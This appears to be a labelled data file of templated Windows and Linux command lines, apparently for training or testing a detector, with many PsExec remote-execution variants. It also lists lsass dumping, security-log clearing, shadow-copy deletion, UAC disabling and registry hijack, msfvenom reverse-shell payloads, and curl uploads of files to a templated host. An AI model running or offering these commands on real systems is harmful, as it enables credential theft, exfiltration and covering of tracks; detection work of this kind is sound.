1	Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	Psexec64 \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}
1	cmd /c "Psexec64 \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	powershell -c "Psexec64 \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	Psexec64.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}
1	cmd /c "Psexec64.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	powershell -c "Psexec64.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
1	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d
0	cmd /c "choco install -f Megasync"
0	powershell -c "curl -X POST -F 'file=@${source_file_path}' http://${ip_address}:${port}/upload"
0	cmd /c "procdump -accepteula -mm lsass lsassdump.dmp"
0	powershell -c "sc.exe stop ${service_name}"
0	powershell -c "sdelete.exe -f -q -accepteula ${local_file_path}"
0	powershell -c "taskkill.exe /F /im ${process_name}"
0	cmd /c "curl -v -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	cmd /c "7z a ${destination_file_path} ${source_file_path} -p${password}"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ /f"
0	certutil -encode -f ${source_file_path} ${destination_file_path}
0	certutil -encode -Unicode -gmt error.txt encode.txt
0	powershell -c "plink -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
0	msfvenom -p windows/meterpreter_reverse_https LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	arp.exe -a
0	cmd /c "curl.exe -X POST -F file=@${source_file_path} http://${ip_address}:${port}/upload"
0	powershell -c "curl -X POST -H -F 'file=@${source_file_path}' http://${ip_address}:${port}/upload"
0	wevtutil clear-log security
0	cmd /c "choco install -f putty"
0	procdump.exe -ma lsass.exe lsassdump.dmp
0	cmd /c "mstsc.exe /v:${ip_address} /f /remoteGuard"
0	powershell -c "7z a -slp ${destination_file_path} ${source_file_path} -p${password}"
0	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p${password}"
0	cmd /c "procdump.exe -accepteula -mm lsass lsassdump.dmp"
0	cat email.txt | mailx -s ${email_subject} ${username}@${domain} 2> error.log
0	powershell -c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
0	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p"
0	mail -s ${email_subject} ${username}@${domain} < mail.txt 2> /dev/null
0	cmd /c "msfvenom -p windows/x64/shell/reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	echo -e ${email_content} | ssmtp ${username}@${domain}
0	mstsc.exe /v:${ip_address} /f /remoteGuard
0	7z a -slp ${destination_file_path} ${source_file_path} -p
0	nmap -v ${ip_address}
0	powershell -c "choco install -f psexec"
0	cmd /c "choco install -f Megasync"
0	powershell -c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD_LITTLE_ENDIAN /d 0 /f"
0	powershell -c "wmic.exe shadowcopy call create Volume=C:"
0	powershell -c "msfvenom -p windows/meterpreter/reverse_tcp_rc4_dns LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	powershell -c "del /f ${local_file_path}"
0	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain} 2> /dev/null
0	cmd /c "certutil -encode -UnicodeText -gmt error.txt encode.txt"
0	cmd /c "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD /d 0 /f"
0	powershell -c "vssadmin.exe delete shadows /all"
0	cmd /c "choco install -f 7zip"
0	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ /f"
0	powershell -c "del /q /f ${local_file_path}"
0	powershell -c "wevtutil cl application"
0	certutil -encode -UnicodeText -f error.txt encode.txt
0	powershell -c "curl -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	mail -s ${email_subject} ${username}@${domain} < mail.txt 2> /dev/null
0	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
0	del /q /p ${local_file_path}
0	mstsc /v:${ip_address} /f /admin
0	cmd /c "curl.exe -X POST http://${ip_address}/upload -F 'files=@${source_file_path}'"
0	cmd /c "choco install procdump"
0	powershell -c "sdelete.exe -s ${local_file_path}"
0	del /f /p ${local_file_path}
0	nmap -p- -sC ${ip_address}
0	mstsc.exe /v:${ip_address} /f /admin
0	cmd /c "sdelete.exe ${local_file_path}"
0	sdelete.exe -s -accepteula ${local_file_path}
0	mail -s ${email_subject} ${username}@${domain} < mail.txt 2> error.log
0	vssadmin Delete Shadows /all
